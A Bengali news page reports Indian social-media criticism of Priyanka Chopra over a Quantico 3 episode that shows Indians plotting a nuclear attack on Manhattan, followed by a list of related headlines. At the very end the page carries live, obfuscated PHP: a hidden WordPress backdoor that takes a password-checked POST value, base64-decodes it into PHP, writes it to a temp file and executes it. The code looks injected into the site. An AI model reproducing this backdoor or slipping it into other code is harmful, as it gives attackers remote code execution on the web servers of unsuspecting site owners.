বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

ভারতীয়রা জঙ্গি, তোপের মুখে প্রিয়াঙ্কা!

news-image

বিনোদন ডেস্ক: বলিউডে তুমুল জনপ্রিয়তার পর এখন হলিউডপাড়ায় ব্যস্ত সময় কাটাচ্ছেন প্রিয়াঙ্কা চোপড়া। মার্কিন টিভি সিরিয়াল কোয়ান্টিকোতে অভিনয় করে প্রশংসিতও হয়েছেন। এবার এই সিরিয়ালটিতে ভারতীয়দের জঙ্গি হিসেবে তুলে ধরা হয়েছে। খবর: এপিবি আনন্দ।

এজন্য সোশ্যাল মিডিয়ায় প্রিয়াঙ্কার উপর চটেছেন ভারতীয়রা। নিজ দেশের এমন অপমানের পরও প্রিয়াঙ্কা কেন এই সিরিয়ালটিতে অভিনয় করছেন? এমন প্রশ্ন নিয়ে অনেকেই সোশ্যাল মিডিয়ায় প্রিয়াঙ্কার সমালোচনা করছেন।

‘কোয়ান্টিকো ৩’ এর গত পর্বে দেখানো হয়েছে, কয়েকজন ভারতীয় নিউইয়র্কের ম্যানহাটনে পরমাণু হামলা চালিয়ে ধ্বংস করার চেষ্টা করে, তারপর দোষ চাপানোর চেষ্টা করে পাকিস্তানের ঘাড়ে।

অনেকেই প্রশ্ন তুলেছেন, যে প্রিয়াঙ্কাকে তার ভক্তরা দেশি গার্লের তকমা দিয়েছেন, তিনি এভাবে দেশের অবমাননার প্রতিবাদ করলেন না কেন? দেশ থেকে এতো ভালোবাসা, সম্মান পাওয়া সত্ত্বেও নিজের শো-তে কীভাবে দেশের মানুষকে জঙ্গি হিসেবে দেখাতে পারলেন তিনি?

একজন মন্তব্য করেছেন, এ ধরনের অনুষ্ঠানে অংশ নেয়ার জন্য প্রিয়াঙ্কার লজ্জা হওয়া উচিত। নিজেকে আর তিনি ভারতীয় বলেন কেন? অন্য একজন বলেন, ‘এ কী ধরনের এপিসোড! ভারতীয়রা কিনা জঙ্গি হামলার ঘটনায় ফাঁসানোর চেষ্টা করছে পাকিস্তানকে!

শুধু প্রিয়ঙ্কা নন, কোয়ান্টিকো নির্মাতাকেও ধিক্কার জানিয়েছেন অনেকে। ‘কোয়ান্টিকো ৩’ অবশ্য এই সিরিয়ালের শেষ সিজন। টিআরপি ক্রমাগত পড়তে থাকায় সংশ্লিষ্ট চ্যানেল এটি বন্ধ করে দেয়ার সিদ্ধান্ত নিয়েছে। কেউ কেউ মনে করছেন এমন বিতর্কিত বিষয়ের মাধ্যমে অনুষ্ঠানটিকে জনপ্রিয় করতে চাইছেন নির্মাতা।

এ জাতীয় আরও খবর

মুক্তিযোদ্ধার ভুয়া সনদ : ভাতা সুদে-আসলে ফেরত নেবে সরকার

তানজিমকে শাস্তি দিয়েছে আইসিসি

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

জীবিকার তাগিদ ঘরে ফিরতে দেয়নি তাদের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}